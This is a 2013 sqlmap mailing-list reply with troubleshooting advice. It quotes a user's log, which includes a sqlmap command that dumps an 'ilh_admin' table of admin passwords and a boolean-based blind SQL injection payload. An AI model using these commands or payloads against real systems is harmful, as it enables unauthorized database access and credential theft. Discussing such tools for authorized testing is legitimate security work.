Re: [sqlmap-users] Data retrieval problem - Question Marks
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Data retrieval problem - Question Marks
|
From: Miroslav S. <mir...@gm...> - 2013-07-16 18:43:09
|
Hi. Please retry everything from the beginning (--flush-session) with --text-only or --string. Please try to run without --threads (there are cases when high number of connections cause problems at the web server side). Kind regards, Miroslav Stampar On Jul 16, 2013 6:30 PM, "Vinicius Da Loop" <vin...@gm...> wrote: > > log: > > imac:sqlmap $ ./sqlmap.py -u "http://target/?ref=foobar" --technique=B > --threads=10 --no-cast -T ilh_admin --dump > > sqlmap/1.0-dev-a639dbb - automatic SQL injection and database takeover > tool > http://sqlmap.org > > [!] legal disclaimer: Usage of sqlmap for attacking targets without prior > mutual consent is illegal. It is the end user's responsibility to obey all > applicable local, state and federal laws. Developers assume no liability > and are not responsible for any misuse or damage caused by this program > > [*] starting at 13:22:41 > > [13:22:41] [INFO] resuming back-end DBMS 'mysql' > [13:22:41] [INFO] testing connection to the target URL > sqlmap identified the following injection points with a total of 0 HTTP(s) > requests: > --- > Place: GET > Parameter: ref > Type: boolean-based blind > Title: AND boolean-based blind - WHERE or HAVING clause > Payload: ref=Manuellaerick' AND 8207=8207 AND 'GPWS'='GPWS > --- > [13:22:41] [INFO] the back-end DBMS is MySQL > web application technology: Apache > back-end DBMS: MySQL 5 > [13:22:41] [WARNING] missing database parameter. sqlmap is going to use > the current database to enumerate table(s) entries > [13:22:41] [INFO] fetching current database > [13:22:41] [INFO] retrieving the length of query output > [13:22:41] [INFO] resumed: 22 > > [sniped] > > [13:22:44] [INFO] retrieving the length of query output > [13:22:44] [INFO] retrieved: 13 > [13:22:54] [INFO] retrieved: ????????????? > [13:22:54] [INFO] retrieving the length of query output > [13:22:54] [INFO] retrieved: 1 > [13:22:58] [INFO] retrieved: _ > [13:23:00] [WARNING] in case of continuous data retrieval problems you are > advised to try a switch '--no-cast' or switch '--hex' > [13:23:00] [INFO] retrieving the length of query output > [13:23:00] [INFO] retrieved: 10 > [13:23:09] [INFO] retrieved: ?????????? > [13:23:09] [INFO] analyzing table dump for possible password hashes > Database: hostl347 > Table: ilh_admin > [1 entry] > +----+------------+---------------+ > | id | pass | admin | > +----+------------+---------------+ > | | ?????????? | ????????????? | > +----+------------+---------------+ > > > ------------------------------------------------------------------------------ > See everything from the browser to the database with AppDynamics > Get end-to-end visibility with application monitoring from AppDynamics > Isolate bottlenecks and diagnose root cause in seconds. > Start your free trial of AppDynamics Pro today! > http://pubads.g.doubleclick.net/gampad/clk?id=48808831&iu=/4140/ostg.clktrk > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
